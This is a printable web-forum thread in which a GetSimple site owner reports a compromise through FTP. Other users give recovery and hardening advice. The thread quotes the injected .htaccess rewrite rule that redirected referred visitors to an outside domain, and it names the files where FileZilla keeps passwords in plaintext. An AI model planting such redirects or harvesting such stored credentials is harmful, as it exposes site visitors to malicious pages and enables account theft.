GetSimple Support Forum
My site hacked: suspicious additions to .htaccess file - Printable Version

+- GetSimple Support Forum (http://get-simple.info/forums)
+-- Forum: GetSimple (http://get-simple.info/forums/forumdisplay.php?fid=3)
+--- Forum: General Questions and Problems (http://get-simple.info/forums/forumdisplay.php?fid=16)
+--- Thread: My site hacked: suspicious additions to .htaccess file (/showthread.php?tid=4266)

My site hacked: suspicious additions to .htaccess file - andy.storey - 2013-02-06

hi all

My website
http://cycling-jersey-collection.com/

stopped working overnight, and after looking at at the files on the server there was .htaccess files in every directory.

Here's some of the code that was in the .htaccess files
<IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteCond %{HTTP_REFERER} ^http://[w.]*([^/]+) RewriteCond %{HTTP_HOST}/%1 !^[w.]*([^/]+)/$ [NC] RewriteRule ^.*$ http://medlab-pdm.de/mchd.html?h=1393979 [L,R] </IfModule>

I have now removed them all, and have re-uploaded my "proper" .htaccess file too.

Has anybody else encountered this and do anyof you have any suggestions to stop it happening again.

Many thanks

Andy

RE: My site hacked: suspicious additions to .htaccess file - Timbow - 2013-02-06

Your site is not fixed
Redirected to this.
Redirecting to google now

RE: My site hacked: suspicious additions to .htaccess file - shawn_a - 2013-02-06

Get copies of your accesslogs ASAP.

RE: My site hacked: suspicious additions to .htaccess file - andy.storey - 2013-02-06

somehow they accessed the site via ftp despite me having a long, non-english word password with caps and numbers!

i've now blocked both IP address at the firewall.

RE: My site hacked: suspicious additions to .htaccess file - Connie - 2013-02-07

andy,

did you contact your hoster? They should protect the systems better...

RE: My site hacked: suspicious additions to .htaccess file - yojoe - 2013-02-07

(2013-02-06, 22:11:55)andy.storey Wrote: Has anybody else encountered this and do anyof you have any suggestions to stop it happening again.

If you store unencrypted passwords in FTP app you use, infection might happen again. The same goes to all other users also having ftp accounts, and store them unencrypted. Their computers might be infected with a virus.

I suggest changing ftp passwords asap, and encrypt them or not store them at all. The same goes to main hosting account pass, if it's also used to connect to FTP.

Of course infection could happen through a security hole in another webapp or its plugin.

RE: My site hacked: suspicious additions to .htaccess file - andy.storey - 2013-02-07

thanks yojoe

i've changed the cPanel and ftp passwords to 2 different passwords.

I've also changed FTP programmes (was using filezilla) and will no longer "Save Passwords" in the new FTP prog.

a.

RE: My site hacked: suspicious additions to .htaccess file - yojoe - 2013-02-07

saved ftp pass in filezilla ? :\
This app is a nightmare. At least you know the way of infection.

ps. Rescan your PC with AV software, might be even online
You may find links to usefeul scanners on this page: http://www.itsecurity.com/features/free-online-antivirus-tools-101207/

RE: My site hacked: suspicious additions to .htaccess file - shovenose - 2013-02-07

(2013-02-07, 00:29:19)Connie Wrote: andy,

did you contact your hoster? They should protect the systems better...

Oh yeah because a user using insecure software on this computer and getting compromised is really the fault of the hosting company?

RE: My site hacked: suspicious additions to .htaccess file - shovenose - 2013-02-07

(2013-02-07, 03:33:29)yojoe Wrote: saved ftp pass in filezilla ? :\
This app is a nightmare. At least you know the way of infection.

ps. Rescan your PC with AV software, might be even online
You may find links to usefeul scanners on this page: http://www.itsecurity.com/features/free-online-antivirus-tools-101207/

This.
I highly recommend you scan the computer with Malwarebytes Anti-Malware Free Edition. It's a great scanner (not pro active Anti-virus protection)...

RE: My site hacked: suspicious additions to .htaccess file - shawn_a - 2013-02-07

What's wrong with FileZilla? Surely it safely stores passwords. No?

RE: My site hacked: suspicious additions to .htaccess file - shovenose - 2013-02-07

(2013-02-07, 12:49:36)shawn_a Wrote: What's wrong with FileZilla? Surely it safely stores passwords. No?

Stored in plaintext!
Go to C:\Users\Michel\AppData\Roaming\FileZilla in Windows, open recentservers.xml and sitemanager.xml all of your usernames, passwords, hostnames, ips, etc. are in there, unencrypted!

RE: My site hacked: suspicious additions to .htaccess file - shawn_a - 2013-02-07

ooh

RE: My site hacked: suspicious additions to .htaccess file - yojoe - 2013-02-07

shawn: filezilla never had a way to encrypt stored passwords, thus I always advised against using it.
I suggest using unreal commander (with a free licence) as it allows to encrypt with main pass or with systemID and main pass. There's also "freecommander" but I haven't tested its FTP capabilities.

btw. infections through FTP happens pretty often.
At least browsers and search engines warn visitors when they enter an infected website.

RE: My site hacked: suspicious additions to .htaccess file - rezfill - 2013-02-15

So far I can only suspect that FTP passwords were somehow intercepted and suggest that you use SFTP instead of FTP if your hosting plan provides SFTP access.